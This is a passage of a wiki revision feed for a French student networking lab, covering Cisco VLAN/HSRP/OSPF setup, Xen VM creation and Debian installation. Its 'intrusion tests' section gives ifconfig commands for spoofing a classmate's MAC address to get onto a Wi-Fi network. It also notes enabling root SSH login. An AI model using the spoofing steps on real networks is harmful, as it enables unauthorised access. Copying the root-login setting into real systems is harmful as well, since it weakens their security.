&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22932</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22932"/>
				<updated>2015-11-13T14:14:38Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22931</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22931"/>
				<updated>2015-11-13T14:14:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
